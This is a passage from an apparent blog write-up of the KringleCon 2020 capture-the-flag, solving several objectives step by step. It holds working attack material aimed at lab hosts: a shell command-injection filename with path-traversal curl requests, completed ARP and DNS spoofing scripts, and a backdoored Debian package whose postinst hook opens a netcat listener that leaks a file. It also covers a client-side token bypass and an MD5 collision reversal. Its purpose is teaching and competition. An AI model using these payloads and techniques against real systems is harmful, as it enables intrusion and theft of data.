<h2 id="crafting-the-payload">Crafting the payload <a href="#crafting-the-payload" class="anchor">🔗</a></h2><p>From the code analysis, we&rsquo;ve seen that this line is prone to RCE.</p>
<p><code>system(&quot;convert -resize 800x600\\&gt; -quality 75 '#{ filename }' '#{ out_path }'&quot;)</code></p>
<p>We will input a specially crafted <code>filename</code> which will close the opening single quote <code>'</code>, then execute our command of choice, and comment the rest of the line.</p>
<p>This is the filename I came up while testing it locally in <code>irb</code>.</p>
<p><code>'; echo $GREETZ &gt; pwned;#.png</code></p>
<p>This input effectively becomes:</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">convert -resize 800x600<span style="color:#b62;font-weight:bold">\\</span>&gt; -quality <span style="color:#666">75</span> <span style="color:#b44">&#39;&#39;</span>; <span style="color:#a2f">echo</span> <span style="color:#b8860b">$GREETZ</span> &gt; pwned;<span style="color:#080;font-style:italic">#.png&#39; &#39;&lt;uuid&gt;.png&#39;</span>
</code></pre></div><p>Note the .png extension at the end. Our filename has to end with one of the image extensions, otherwise it won&rsquo;t reach the <code>handle_image</code> function, which is where the <code>system()</code> command is.</p>
<p>The command <code>echo $GREETZ &gt; pwned</code> dumps the linux environment variable <strong>GREETZ</strong> into the file<code>pwned</code> in the current directory. The app is configured to operate in the <code>/tmp/</code> directory, so this is desired.</p>
<p>Finally, we will wrap this special file in a zip file in order to preserve the exact filename.</p>
<p>Prepare the payload:</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#b8860b">filename</span><span style="color:#666">=</span><span style="color:#b44">&#34;&#39;; echo \$GREETZ &gt; pwned;#.png&#34;</span>
touch <span style="color:#b44">&#34;</span><span style="color:#b8860b">$filename</span><span style="color:#b44">&#34;</span> <span style="color:#080;font-style:italic"># create empty file</span>
zip payload.zip <span style="color:#b44">&#34;</span><span style="color:#b8860b">$filename</span><span style="color:#b44">&#34;</span>
</code></pre></div><h2 id="exploiting">Exploiting <a href="#exploiting" class="anchor">🔗</a></h2><p>Finally, the fun part! All we have to do is upload our malicious zip file, wait a bit for the remote code to execute, and fetch the newly created file containing our variable. Let&rsquo;s get to it.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#b8860b">url</span><span style="color:#666">=</span><span style="color:#b44">&#34;https://tag-generator.kringlecastle.com&#34;</span>
curl -i -X POST -F my_file<span style="color:#666">[]=</span>@payload.zip <span style="color:#b44">&#34;</span><span style="color:#b8860b">$url</span><span style="color:#b44">/upload&#34;</span>
sleep <span style="color:#666">1</span> <span style="color:#080;font-style:italic"># zZZzzz</span>
curl <span style="color:#b44">&#34;</span><span style="color:#b8860b">$url</span><span style="color:#b44">/image?id=../../../tmp/pwned&#34;</span>
</code></pre></div><p>Response: <strong>JackFrostWasHere</strong></p>
<h2 id="alternative">Alternative <a href="#alternative" class="anchor">🔗</a></h2><p>I&rsquo;ve solved this task using the RCE method. There is another, more straightforward way of solving it. We could simply use the flawed <code>image</code> endpoint to list the file containing all environment variables. In linux, there are multiple locations where these files might reside.
After trying out several of these locations, I was finally able to get it by listing the “file” <code>/proc/1/environ</code>. All linux processes have PIDs, and 1 is the the PID of a first process created by the linux kernel.</p>
<p><code>$ curl https://tag-generator.kringlecastle.com/image?id=../../../proc/1/environ --output -</code></p>
<h1 id="objective-9---arp-shenanigans">Objective 9 - ARP Shenanigans <a href="#objective-9---arp-shenanigans" class="anchor">🔗</a></h1><p><strong>Task:</strong> <em>Go to the NetWars room on the roof and help Alabaster Snowball get access back to a host using ARP. Retrieve the document at /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Who recused herself from the vote described on the document?</em></p>
<p>In this task, we will perform a <code>Man-In-The-Middle</code> attack on Jack&rsquo;s computer.</p>
<p>Here is a high level overview of the attack.</p>
<p>Jack wants to download a file <code>suriv_amd64.deb</code> from some remote server. We will intercept the traffic and redirect his request to our computer. When he asks for this file, we&rsquo;ll serve him our carefully crafted malicious file instead. He&rsquo;ll then attempt to install it, which will create a backdoor on his computer. Finally, we&rsquo;ll connect through this backdoor and use it to retrieve the document.</p>
<h2 id="sniffing-network-traffic">Sniffing network traffic <a href="#sniffing-network-traffic" class="anchor">🔗</a></h2><p>First, let&rsquo;s see what&rsquo;s happening on the network</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-plaintext" data-lang="plaintext">$ tshark -i eth0
Capturing on &#39;eth0&#39;
  1 0.000000000 4c:24:57:ab:ed:84 → Broadcast    ARP 42 Who has 10.6.6.53? Tell 10.6.6.35
  2 1.036011218 4c:24:57:ab:ed:84 → Broadcast    ARP 42 Who has 10.6.6.53? Tell 10.6.6.35
  3 2.080121753 4c:24:57:ab:ed:84 → Broadcast    ARP 42 Who has 10.6.6.53? Tell 10.6.6.35
  4 3.111996102 4c:24:57:ab:ed:84 → Broadcast    ARP 42 Who has 10.6.6.53? Tell 10.6.6.35
</code></pre></div><p>We see Jack&rsquo;s IP <code>10.6.6.35</code> ARP probing for IP <code>10.6.6.53</code>. He is essentially asking for the MAC address of the machine with the IP <code>10.6.6.53</code>. Such machine should normally respond to his request. However, we will be faster. We will respond to him instead, providing our MAC address in the response.</p>
<h2 id="fixing-the-provided-scripts">Fixing the provided scripts <a href="#fixing-the-provided-scripts" class="anchor">🔗</a></h2><p>We have two scripts at our disposal. <code>arp_resp.py</code> and <code>dns_resp.py</code></p>
<p>The first one is responsible for ARP spoofing. It will cause his ARP table to be updated, so that the IP <code>10.6.6.53</code> is associated with our MAC address, effectively redirecting traffic at the link-layer to our machine.<br>
The second script waits for Jack&rsquo;s DNS query request, and responds back to him by resolving the query to our IP.</p>
<p>Both scripts are incomplete. Completing them is a matter of correctly filling in the packet data.</p>
<p>File <strong>arp_resp.py</strong></p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">    <span style="color:#666">...</span>
    ether_resp <span style="color:#666">=</span> Ether(dst<span style="color:#666">=</span>packet[Ether]<span style="color:#666">.</span>src, <span style="color:#a2f">type</span><span style="color:#666">=</span><span style="color:#666">0x806</span>, src<span style="color:#666">=</span>macaddr)
    <span style="color:#666">...</span>
    arp_response <span style="color:#666">=</span> ARP(pdst<span style="color:#666">=</span>packet[ARP]<span style="color:#666">.</span>psrc)
    arp_response<span style="color:#666">.</span>op <span style="color:#666">=</span> <span style="color:#666">2</span>
    arp_response<span style="color:#666">.</span>plen <span style="color:#666">=</span> <span style="color:#666">4</span>
    arp_response<span style="color:#666">.</span>hwlen <span style="color:#666">=</span> <span style="color:#666">6</span>
    arp_response<span style="color:#666">.</span>ptype <span style="color:#666">=</span> <span style="color:#666">2048</span>
    arp_response<span style="color:#666">.</span>hwtype <span style="color:#666">=</span> <span style="color:#666">1</span>

    arp_response<span style="color:#666">.</span>hwsrc <span style="color:#666">=</span> macaddr
    arp_response<span style="color:#666">.</span>psrc <span style="color:#666">=</span> packet[ARP]<span style="color:#666">.</span>pdst
    arp_response<span style="color:#666">.</span>hwdst <span style="color:#666">=</span> packet[ARP]<span style="color:#666">.</span>hwsrc
    arp_response<span style="color:#666">.</span>pdst <span style="color:#666">=</span> packet[ARP]<span style="color:#666">.</span>psrc
</code></pre></div><p>File <strong>dns_resp.py</strong></p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">ipaddr_we_arp_spoofed <span style="color:#666">=</span> <span style="color:#b44">&#34;10.6.6.53&#34;</span>
    <span style="color:#666">...</span>
    eth <span style="color:#666">=</span> Ether(src<span style="color:#666">=</span>macaddr, dst<span style="color:#666">=</span>packet[Ether]<span style="color:#666">.</span>src)
    ip  <span style="color:#666">=</span> IP(dst<span style="color:#666">=</span>packet[IP]<span style="color:#666">.</span>src, src<span style="color:#666">=</span>ipaddr_we_arp_spoofed)
    udp <span style="color:#666">=</span> UDP(dport<span style="color:#666">=</span>packet[UDP]<span style="color:#666">.</span>sport, sport<span style="color:#666">=</span><span style="color:#666">53</span>)
    <span style="color:#666">...</span>
        <span style="color:#a2f">id</span><span style="color:#666">=</span>packet[DNS]<span style="color:#666">.</span>id,
        qr<span style="color:#666">=</span><span style="color:#666">1</span>, 
        aa<span style="color:#666">=</span><span style="color:#666">1</span>, 
        ancount<span style="color:#666">=</span><span style="color:#666">1</span>,
        qd <span style="color:#666">=</span> packet[DNS]<span style="color:#666">.</span>qd,
        an<span style="color:#666">=</span>DNSRR(rrname<span style="color:#666">=</span>packet[DNS]<span style="color:#666">.</span>qd<span style="color:#666">.</span>qname, ttl<span style="color:#666">=</span><span style="color:#666">10</span>, rdata<span style="color:#666">=</span>ipaddr)
    <span style="color:#666">...</span>
</code></pre></div><h2 id="testing-the-scripts">Testing the scripts <a href="#testing-the-scripts" class="anchor">🔗</a></h2><p>We are expecting an HTTP request. So let&rsquo;s start a simple http server</p>
<p><code>$ python3 -m http.server</code></p>
<p>After running the two provided scripts, and observing network traffic, we can see that the spoof is successful. Traffic is getting redirected, and in the HTTP logs, we can clearly see the attempted GET request.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ python3 -m http.server <span style="color:#666">80</span>
Serving HTTP on 0.0.0.0 port <span style="color:#666">80</span> <span style="color:#666">(</span>http://0.0.0.0:80/<span style="color:#666">)</span> ...
10.6.6.35 - - <span style="color:#666">[</span>28/Dec/2020 18:15:37<span style="color:#666">]</span> code 404, message File not found
10.6.6.35 - - <span style="color:#666">[</span>28/Dec/2020 18:15:37<span style="color:#666">]</span> <span style="color:#b44">&#34;GET /pub/jfrost/backdoor/suriv_amd64.deb HTTP/1.1&#34;</span> <span style="color:#666">404</span> -
</code></pre></div><h2 id="preparing-the-payload">Preparing the payload <a href="#preparing-the-payload" class="anchor">🔗</a></h2><p>All debian packages have a post-installation hook, whereby we can specify arbitrary commands to be executed upon installation. We&rsquo;ll use this mechanism to execute a <code>netcat</code> listener which will bind to a port <code>1337</code>, and upon connection to that port, print the desired file.</p>
<p>The netcat binary itself will come from the package we are just about to build. We have to modify the original netcat .deb file, and add the postinst hook.</p>
<p>Prepare the work directory</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ <span style="color:#a2f">cd</span> debs
$ mkdir work
</code></pre></div><p>Unpack the original netcat package</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ dpkg -x netcat-traditional_1.10-41.1ubuntu1_amd64.deb work/
</code></pre></div><p>The post-install hook should be put inside <code>/DEBIAN/postinst</code> file</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ mkdir work/DEBIAN
$ <span style="color:#b8860b">doc</span><span style="color:#666">=</span><span style="color:#b44">&#34;/NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt&#34;</span>
$ <span style="color:#a2f">echo</span> <span style="color:#b44">&#34;/bin/nc.traditional -l -p 1337 -c &#39;cat </span><span style="color:#b8860b">$doc</span><span style="color:#b44">&#39;&#34;</span> &gt; work/DEBIAN/postinst
</code></pre></div><p>Also, we need to create a generic <code>/DEBIAN/control</code> file, required for building the package</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ <span style="color:#a2f">echo</span> <span style="color:#b44">&#39;Package: mypkg
</span><span style="color:#b44">Version: 1.0.0
</span><span style="color:#b44">Maintainer: Your Name &lt;you@example.com&gt;
</span><span style="color:#b44">Description: My test package, please ignore
</span><span style="color:#b44">Homepage: https://github.com/username/projectname
</span><span style="color:#b44">Architecture: all&#39;</span> &gt; work/DEBIAN/control
</code></pre></div><p>Apply correct permissions and build the package!</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ chmod <span style="color:#666">755</span> work/DEBIAN/postinst
$ dpkg-deb --build work
dpkg-deb: building package <span style="color:#b44">&#39;mypkg&#39;</span> in <span style="color:#b44">&#39;work.deb&#39;</span>.
</code></pre></div><h2 id="serving-the-payload">Serving the payload <a href="#serving-the-payload" class="anchor">🔗</a></h2><p>The absolute path of the file he is requesting is <code>/pub/jfrost/backdoor/suriv_amd64.deb</code></p>
<p>We need to recreate this directory structure on our machine. Then, we copy our payload to this directory, renaming it properly. Lastly, we start the server on port <code>80</code>.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ <span style="color:#a2f">cd</span> ..
$ mkdir -p pub/jfrost/backdoor
$ mv debs/work.deb pub/jfrost/backdoor/suriv_amd64.deb
$ python3 -m http.server <span style="color:#666">80</span>
Serving HTTP on 0.0.0.0 port <span style="color:#666">80</span> <span style="color:#666">(</span>http://0.0.0.0:80/<span style="color:#666">)</span> ...
</code></pre></div><h2 id="launching-the-attack">Launching the attack <a href="#launching-the-attack" class="anchor">🔗</a></h2><p>Now that the server is ready. It&rsquo;s time to launch the two python scripts again. We just have to make sure to run the <code>dns_resp.py</code> before <code>arp_resp.py</code></p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ ./scripts/dns_resp.py
.
Sent <span style="color:#666">1</span> packets.
</code></pre></div><div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ ./scripts/arp_resp.py
.
Sent <span style="color:#666">1</span> packets.
</code></pre></div><p>After a few seconds, a backdoor should be created on his computer. Any connection made to his IP on port <code>1337</code> will echo out the secret document.</p>
<p>So, let&rsquo;s now connect to his netcat session and retrieve the document</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ ./nc.traditional 10.6.6.35 <span style="color:#666">1337</span> &gt; document.txt
$ grep <span style="color:#b44">&#39;recused&#39;</span> document.txt
... Tanta Kringle recused herself from the vote given her adoption of Kris Kringle as a son early in his life.
</code></pre></div><p>Answer: <strong>Tanta Kringle</strong></p>
<h1 id="objective-10---defeat-fingerprint-sensor">Objective 10 - Defeat Fingerprint Sensor <a href="#objective-10---defeat-fingerprint-sensor" class="anchor">🔗</a></h1><p><strong>Task:</strong> <em>Bypass the Santavator fingerprint sensor. Enter Santa&rsquo;s office without Santa&rsquo;s fingerprint.</em></p>
<p>This task was fairly straightforward once you knew how to approach it. 
Opening the santavator panel and a Javascript console, I skimmed through the <code>app.js</code>. In the code, there is a security check on line <code>354</code> which checks if token <strong>besanta</strong> is present. Depending on this boolean value it will either teleport us, or play an error sound.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#a2f;font-weight:bold">if</span> (btn4.classList.contains(<span style="color:#b44">&#39;powered&#39;</span>) <span style="color:#666">&amp;&amp;</span> hasToken(<span style="color:#b44">&#39;besanta&#39;</span>)) {
  $.ajax({
    . . .
    success<span style="color:#666">:</span> (res, status) =&gt; {
      <span style="color:#a2f;font-weight:bold">if</span> (res.hash) {
        __POST_RESULTS__({
          resourceId<span style="color:#666">:</span> getParams.id <span style="color:#666">||</span> <span style="color:#b44">&#39;1111&#39;</span>,
          hash<span style="color:#666">:</span> res.hash,
          action<span style="color:#666">:</span> <span style="color:#b44">&#39;goToFloor-3&#39;</span>,
        });
      }
    }
  });
} <span style="color:#a2f;font-weight:bold">else</span> {
  __SEND_MSG__({
    type<span style="color:#666">:</span> <span style="color:#b44">&#39;sfx&#39;</span>,
    filename<span style="color:#666">:</span> <span style="color:#b44">&#39;error.mp3&#39;</span>,
  });
}
</code></pre></div><p>We can verify this token is present by logging in as Santa, and checking the “tokens” variable.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#666">&gt;</span> tokens
<span style="color:#666">&lt;</span> (<span style="color:#666">11</span>) [<span style="color:#b44">&#34;marble&#34;</span>, <span style="color:#b44">&#34;portals&#34;</span>, <span style="color:#b44">&#34;nut2&#34;</span>, <span style="color:#b44">&#34;candycane&#34;</span>, <span style="color:#b44">&#34;ball&#34;</span>, ... , <span style="color:#b44">&#34;besanta&#34;</span>]
</code></pre></div><p>So, to bypass the fingerprint sensor, all we have to do is login as ourselves, open the santavator panel, open the JS console and insert our special token in the <code>tokens</code> variable.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-javascript" data-lang="javascript"><span style="color:#666">&gt;</span> tokens.push(<span style="">‘</span>besanta<span style="">’</span>)
</code></pre></div><p>Now we can click on the fingerprint sensor, and we’re in!<br>
(Alternatively, we could have deleted the security check for this token on line 354)</p>
<h1 id="objective-11a---naughtynice-list-with-blockchain-investigation-part-1">Objective 11a - Naughty/Nice List with Blockchain Investigation Part 1 <a href="#objective-11a---naughtynice-list-with-blockchain-investigation-part-1" class="anchor">🔗</a></h1><p><strong>Task:</strong> <em>Even though the chunk of the blockchain that you have ends with block 129996, can you predict the nonce for block 130000? Talk to Tangle Coalbox in the Speaker UNpreparedness Room for tips on prediction and Tinsel Upatree for more tips and tools. (Enter just the 16-character hex value of the nonce)</em></p>
<p>The blockchain that we have generates pseudo-random nonces using the <code>random</code> module. This module is built into Python, and internally uses a widely accepted <code>Mersenne Twister</code> algorithm.
However, as it turns out, given enough data (624 numbers), we can predict what the next number will be.</p>
<p>There is a python module implementing this prediction: <code>mersenne-twister-predictor</code>. We will use this module to import the last 624 nonces from the blockchain into the predictor. Then, we&rsquo;ll skip the next three numbers, and finally predict the nonce for block 130000.</p>
<p>The predictor module can be installed with <code>pip</code> as follows:</p>
<p><code>$ pip install mersenne-twister-predictor</code></p>
<p>And here&rsquo;s the final code that prints out the nonce</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#a2f;font-weight:bold">from</span> <span style="color:#00f;font-weight:bold">mt19937predictor</span> <span style="color:#a2f;font-weight:bold">import</span> MT19937Predictor

predictor <span style="color:#666">=</span> MT19937Predictor()
   
c1 <span style="color:#666">=</span> Chain(load<span style="color:#666">=</span>True, filename<span style="color:#666">=</span><span style="color:#b44">&#39;blockchain.dat&#39;</span>)
buff <span style="color:#666">=</span> c1<span style="color:#666">.</span>blocks[<span style="color:#666">-</span><span style="color:#666">624</span>:] <span style="color:#080;font-style:italic"># Get last 624 blocks</span>

<span style="color:#080;font-style:italic"># Import data into predictor</span>
<span style="color:#a2f;font-weight:bold">for</span> i <span style="color:#a2f;font-weight:bold">in</span> <span style="color:#a2f">range</span>(<span style="color:#a2f">len</span>(buff)):
    nonce <span style="color:#666">=</span> buff[i]<span style="color:#666">.</span>nonce
    predictor<span style="color:#666">.</span>setrandbits(nonce, <span style="color:#666">64</span>)

<span style="color:#080;font-style:italic"># Skip next three numbers</span>
[predictor<span style="color:#666">.</span>getrandbits(<span style="color:#666">64</span>) <span style="color:#a2f;font-weight:bold">for</span> _ <span style="color:#a2f;font-weight:bold">in</span> <span style="color:#a2f">range</span>(<span style="color:#666">3</span>)]
    
<span style="color:#a2f;font-weight:bold">print</span>(<span style="color:#b44">&#39;</span><span style="color:#b68;font-weight:bold">%016.016x</span><span style="color:#b44">&#39;</span> <span style="color:#666">%</span> predictor<span style="color:#666">.</span>getrandbits(<span style="color:#666">64</span>))   
</code></pre></div><p>Answer: <strong>57066318f32f729d</strong></p>
<h1 id="objective-11b---naughtynice-list-with-blockchain-investigation-part-2">Objective 11b - Naughty/Nice List with Blockchain Investigation Part 2 <a href="#objective-11b---naughtynice-list-with-blockchain-investigation-part-2" class="anchor">🔗</a></h1><p><strong>Task:</strong> <em>The SHA256 of Jack&rsquo;s altered block is: 58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f. If you&rsquo;re clever, you can recreate the original version of that block by changing the values of only 4 bytes. Once you&rsquo;ve recreated the original block, what is the SHA256 of that block?</em></p>
<h2 id="finding-the-altered-block">Finding the altered block <a href="#finding-the-altered-block" class="anchor">🔗</a></h2><p>Finding the modified block is fairly straighforward. We already have the hash of the altered block. If we loop through the whole blockchain, and compare the hash of each block with our given hash, we can exactly pinpoint Jack&rsquo;s modified block.</p>
<p>This little python snippet does just that</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">jack_hash <span style="color:#666">=</span> <span style="color:#b44">&#39;58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f&#39;</span>

blocks <span style="color:#666">=</span> Chain(load<span style="color:#666">=</span>True, filename<span style="color:#666">=</span><span style="color:#b44">&#39;blockchain.dat&#39;</span>)<span style="color:#666">.</span>blocks

<span style="color:#a2f;font-weight:bold">for</span> i <span style="color:#a2f;font-weight:bold">in</span> <span style="color:#a2f">range</span>(<span style="color:#a2f">len</span>(blocks)):
    curr_hash <span style="color:#666">=</span> SHA256<span style="color:#666">.</span>new()
    curr_hash<span style="color:#666">.</span>update(blocks[i]<span style="color:#666">.</span>block_data_signed())
    <span style="color:#a2f;font-weight:bold">if</span> curr_hash<span style="color:#666">.</span>hexdigest() <span style="color:#666">==</span> jack_hash:
        <span style="color:#a2f;font-weight:bold">print</span>(blocks[i]) <span style="color:#080;font-style:italic"># Found!</span>
        <span style="color:#a2f;font-weight:bold">break</span>
</code></pre></div><p>Output:</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-plaintext" data-lang="plaintext">Chain Index: 129459
              Nonce: a9447e5771c704f4
                PID: 0000000000012fd1
                RID: 000000000000020f
     Document Count: 2
              Score: ffffffff (4294967295)
               Sign: 1 (Nice)
         Data item: 1
               Data Type: ff (Binary blob)
             Data Length: 0000006c
                    Data: b&#39;ea46534030...&#39;
         Data item: 2
               Data Type: 05 (PDF)
             Data Length: 00009f57
                    Data: b&#39;255044462d...&#39;
               Date: 03/24
               Time: 13:21:41
       PreviousHash: 4a91947439046c2dbaa96db38e924665
  Data Hash to Sign: 347979fece8d403e06f89f8633b5231a
          Signature: b&#39;MJIxJy2iFXJRCN1EwDsqO9NzE2Dq1qlvZuFFlljmQ03+erFpqqgSI1xhfAwlfmI2MqZWXA9RDTVw3+aWPq2S0CKuKvXkDOrX92cPUz5wEMYNfuxrpOFhrK2sks0yeQWPsHFEV4cl6jtkZ//OwdIznTuVgfuA8UDcnqCpzSV9Uu8ugZpAlUY43Y40ecJPFoI/xi+VU4xM0+9vjY0EmQijOj5k89/AbMAD2R3UbFNmmR61w7cVLrDhx3XwTdY2RCc3ovnUYmhgPNnduKIUA/zKbuu95FFi5M2r6c5Mt6F+c9EdLza24xX2J4l3YbmagR/AEBaF9EBMDZ1o5cMTMCtHfw==&#39;
</code></pre></div><p>It seems Jack gave himself a niceness score of 4294967295 (max unsigned integer)<br>
He also appended one PDF file and one Binary blob (most likely used for generating collision)</p>
<p>The field <code>Data Hash to Sign</code> has a MD5 value <code>347979fece8d403e06f89f8633b5231a</code>. This is the hash of the original data block. When he altered the block, the hash remained the same, due to collision. We&rsquo;ll use this hash to aid us in retrieving the original block.</p>
<h2 id="analyzing-block-header">Analyzing Block Header <a href="#analyzing-block-header" class="anchor">🔗</a></h2><p>From elves, we were told that sometime in March, Jack had a <strong>negative</strong> niceness value. This suggests that, prior to the change, this particular block most likely had a niceness value set to 0, only for it to later be changed to 1.</p>
<p>However, he couldn&rsquo;t have just changed one byte without changing the hash of the whole block. 
That&rsquo;s why Jack utilized the so called unique hash collision technique (<code>unicoll</code>). 
By choosing his own prefix (block data up to <code>sign</code> value) and appending two blocks of random data (binary blob) - eventually, he was able to generate a collision.</p>
<p>In a nutshell, the <code>unicoll</code> attack works like this: when we increase the 10th byte of the prefix by 1, and decrease the 10th byte of the collision block by 1, and compute the MD5 of new data, it will remain the same!</p>
<p>Thus, to undo his changes, we have to apply same modifications in reverse. (prefix -1, collision block +1)</p>
<!-- raw HTML omitted -->
<!-- raw HTML omitted -->
<p>Highlighted in bold are changes required to restore the original block. The MD5 remains intact.</p>
<h2 id="analyzing-pdf-document">Analyzing PDF Document <a href="#analyzing-pdf-document" class="anchor">🔗</a></h2><p>In the <code>Chain</code> class, there&rsquo;s a utility function <code>dump_doc</code>. Let&rsquo;s use it to dump the attached document.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">c1 <span style="color:#666">=</span> Chain(load<span style="color:#666">=</span>True, filename<span style="color:#666">=</span><span style="color:#b44">&#39;blockchain.dat&#39;</span>)
c1<span style="color:#666">.</span>blocks[<span style="color:#666">1010</span>]<span style="color:#666">.</span>dump_doc(<span style="color:#666">2</span>) <span style="color:#080;font-style:italic"># Dumps the pdf file</span>
</code></pre></div><p>This will create a file <code>129459.pdf</code> in the current folder.</p>
<p><p class="markdown-image">
  <img src="/images/kringlecon-2020/jack1.png" alt="jack1"  />
</p></p>
<p>Opening up the PDF, we immediately notice something fishy about it. Jack is praised to oblivion. Clearly, the document is forged. Another indication are the corrupt error messages received when opening the pdf.</p>
<p>Looking at the sheer size of the document, it seems suspiciously large. There must be some hidden content that we are not seeing. Let&rsquo;s take a closer look with a text editor.</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">1:  %PDF-1.3
2:  %%ÁÎÇÅ!
3:
4:  <span style="color:#666">1</span> <span style="color:#666">0</span> obj 
5:  &lt;&lt;/Type/Catalog/_Go_Away/Santa/Pages <span style="color:#666">2</span> <span style="color:#666">0</span> R      0ùÙ¿W&lt;8e&gt;&lt;ªå^Mx&lt;8f&gt;ç<span style="color:#b44">`</span>ó^<span style="color:#666">]</span>d¯ª^^¡ò¡<span style="color:#666">=</span>cu&gt;^Z¥¿&lt;80&gt;bOÃF¿ÖgÊ÷I&lt;95&gt;&lt;91&gt;Ä^B^Aí«^C¹ï&lt;95&gt;&lt;99&gt;^<span style="color:#b62;font-weight:bold">\[</span>I&lt;9f&gt;&lt;86&gt;Ü&lt;85&gt;9&lt;85&gt;&lt;90&gt;&lt;99&gt;­T°^^s?å§¤&lt;89&gt;¹2&lt;95&gt;ÿTh^CMIy8èù¸Ë:ÃÏPð^<span style="color:#666">[</span>2<span style="color:#666">[</span>&lt;9b&gt;^Wtu&lt;95&gt;B+sxð%^Bá©°¬&lt;85&gt;<span style="color:#666">(</span>^Az&lt;9e&gt;
6:  &gt;&gt;
7:  endobj
8:
9:  <span style="color:#666">2</span> <span style="color:#666">0</span> obj
10: &lt;&lt;/Type/Pages/Count 1/Kids<span style="color:#666">[</span><span style="color:#666">23</span> <span style="color:#666">0</span> R<span style="color:#666">]</span>&gt;&gt;
11: endobj
12:
13: <span style="color:#666">3</span> <span style="color:#666">0</span> obj
14: &lt;&lt;/Type/Pages/Count 1/Kids<span style="color:#666">[</span><span style="color:#666">15</span> <span style="color:#666">0</span> R<span style="color:#666">]</span>&gt;&gt;
15: endobj
...
</code></pre></div><p>The <code>5th</code> line declares the default page to be <code>2</code>. Immediately after, we see some random junk, which could presumably be the collision block data. Line <code>13</code> implies there might be alternative content.</p>
<p>By changing the <code>5th</code> line from:</p>
<p><code>&lt;&lt;/Type/Catalog/_Go_Away/Santa/Pages 2 0 R</code></p>
<p>to</p>
<p><code>&lt;&lt;/Type/Catalog/_Go_Away/Santa/Pages 3 0 R</code></p>
<p>and opening the pdf again, we successfully retrieved the original document!</p>
<p><p class="markdown-image">
  <img src="/images/kringlecon-2020/jack2.png" alt="jack2"  />
</p></p>
<p>Note, this is still not enough. In order to preserve the hash value, we have to apply the same procedure as before. This time, it&rsquo;s the other way around. Because we increased one byte by 1, we need to decrease the byte in the collision block by 1. This change should be made in the blockchain block, not in the PDF document itself.</p>
<h2 id="recreating-the-original-block">Recreating the original block <a href="#recreating-the-original-block" class="anchor">🔗</a></h2><p>After altering all 4 bytes, we can check once again, that the MD5 is unchanged.</p>
<p><p class="markdown-image">
  <img src="/images/kringlecon-2020/hexdump.png" alt="hexdump"  />
</p></p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ md5sum jacks_block.bin
347979fece8d403e06f89f8633b5231a
</code></pre></div><p>Finally, we are asked for the SHA256 hash of the original block</p>
<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ sha256sum jacks_block.bin
fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb
</code></pre></div><p>The entire process can be automated in Python:</p>
